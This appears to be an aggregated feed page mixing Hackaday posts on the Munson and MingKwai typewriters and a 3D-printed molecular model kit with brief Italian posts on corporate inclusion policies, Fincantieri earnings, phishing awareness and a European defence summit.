Do you rock a sweet set of peripherals on a screamin’ desk pad? Send me a picture along with your handle and all the gory details, and you could be featured here!
Historical Clackers: the Munson
Image by [Martin Howard] via Antique TypewritersThe delight of the Munson typewriter is in the exposed internal workings, which come to life when the machine is in use. Those octagonal key tops aren’t too shabby, either.
You may have noticed that this machine has no typebars. Instead, it uses a horizontal cylinder about the size of a finger. The cylinder slides from side to side and rotates to find the chosen character. Then a hammer strikes from behind the paper, pushing it against the ribbon and the type cylinder.
Much like the later IBM Selectrics and the daisy wheel machines of the 1970s and ’80s, one could easily change the font by swapping out the all-steel type cylinder. The Munson has two Shift keys, one for upper case and another for figures, so only three rows of keys are needed.
The Munson came out in 1890 and was well-received. It won the highest medal awarded at the World’s Fair Chicago, 1893, but the machines are hard to find these days. Eight years after its introduction, the design of the Munson was acquired by the Chicago Writing Machine Co. and rebranded the Chicago.
Finally, the MingKwai Typewriter Emerges From Obscurity
So you get a Historical Clackers two-fer this week; lucky you! After more than half a century, this fascinating Chinese typewriter turned up while a couple was cleaning out her grandfather’s basement in New York.
Jennifer Felix and her husband Nelson posted photos on a Facebook group trying to ID the machine. A flurry of enthusiastic comments flooded the forum, with many people offering to buy the machine.Photo by Elisabeth von Boch, courtesy of Stanford Libraries; image via This Is Colossal
As it turns out, it’s a MingKwai — the only one in existence. And it’s now in the hands of Stanford Libraries.
This machine was invented in 1947 by a writer, translator, and linguist named Lin Yutang. The MingKwai, which means “clear and fast”, was the first compact concept Chinese typewriter to have a keyboard that was capable of producing 80,000+ characters.
How is that even possible? Mechanical sort and search. Seriously! Check this out: the 72-key board is made up of strokes and shapes, and the characters are arranged in linear order, like an English dictionary. To use it, you would press one of the 36 top keys and one of the 28 bottom keys simultaneously. This triggered a series of rotations in the internals and would bring eight characters into view in a small window that Lin called the “magic eye”. Finally, you would choose your desired character using the numbered keys in the bottom row.
The only known prototype was built by the Carl E. Krum company. Lin was unable to drum up commercial interest to produce it at scale, so he sold the rights and the prototype to Mergenthaler Linotype Company, where Jennifer Felix’s grandfather worked as a machinist. So it never went into production, and the prototype went home with with Grandpa.
youtube.com/embed/FR0RVluoim4?…
Got a hot tip that has like, anything to do with keyboards? Help me out by sending in a link or two. Don’t want all the Hackaday scribes to see it? Feel free to email me directly.
Dobbiamo riflettere bene su cosa sta succedendo.
Perché se ci siamo (giustamente) indignati quando le big tech statunitensi hanno ritirato le politiche di inclusione, perché dovremmo indignarci meno se la stessa cosa accade in casa nostra?
Quale sarà la prossima azienda a farlo?
Segno, purtroppo, che "il male" non è solo oltreoceano, c'è l'abbiamo qui accanto alla nostra porta, restiamo vigili.
900 People Are Collectively Driving an 'Internet Roadtrip' on Google Street View
The new site is a cozy and chaotic sucessor to 'Twitch plays Pokémon.Matthew Gault (404 Media)
Print PLA in PLA with A Giant Molecular Model Kit
It isn’t too often we post a hack that’s just a pure 3D print with no other components, but for this Giant Molecular Model kit by [3D Printy], we’ll make an exception. After all, even if you print with PLA every day, how often do you get to play with its molecular bonds? (If you want to see that molecule, check out the video after the break.)
There are multiple sizes of bonds to represent bond lengths, and two styles: flexible and firm. Flexible bonds are great for multiple covalent bonds, like carbon-carbon bonds in organic molecules. The bonds clip to caps that screw in to the atoms; alternately a bond-cap can screw the atoms together directly. A plethora of atoms is available, in valence values from one to four. The two-bond atom has 180 and 120-degree variations for greater accuracy. In terms of the chemistry this kit could represent, you’re only limited by your imagination and how long you are willing to spend printing atoms and bonds.
[3D Printy] was kind enough to release the whole lot as CC0 Public Domain, so we might be seeing these at craft fairs, as there’s nothing to keep you from selling the prints. Honestly, we can only hope; from an educational standpoint, this is a much better use of plastic than endless flexy dragons.
If you’d prefer your chemistry toys help you do chemistry, try this fidget spinner centrifuge. Perhaps you’d rather be teaching electronics instead?
youtube.com/embed/iVCQ7WUnU90?…
Folgiero accelera su difesa e underwater. I numeri del primo trimestre di Fincantieri
@Notizie dall'Italia e dal mondo
Nel primo trimestre del 2025 Fincantieri consolida il proprio ruolo di attore strategico per la sicurezza europea. Il gruppo guidato da Pierroberto Folgiero chiude il periodo con ricavi pari a 2,376 miliardi di euro, in crescita del 35% rispetto allo
Notizie dall'Italia e dal mondo reshared this.
Phishing: serve consapevolezza per contrastare l’evoluzione della minaccia
@Informatica (Italy e non Italy 😁)
Stiamo assistendo a una continua evoluzione delle minacce che prendono di mira le persone. Per mitigare il rischio, diventa dunque essenziale prevedere simulazioni di attacchi phishing utili per accrescere il livello di consapevolezza e di cultura
Informatica (Italy e non Italy 😁) reshared this.
Il formato Weimar+ prende forma. Difesa e sicurezza comune fuori dai vincoli Ue
@Notizie dall'Italia e dal mondo
I capi delle diplomazie di sei tra i maggiori Paesi europei – Francia, Germania, Italia, Polonia, Spagna e Regno Unito – insieme all’Alto rappresentante dell’Unione europea, Kaja Kallas, si sono incontrati oggi nella capitale britannica per un vertice incentrato
Notizie dall'Italia e dal mondo reshared this.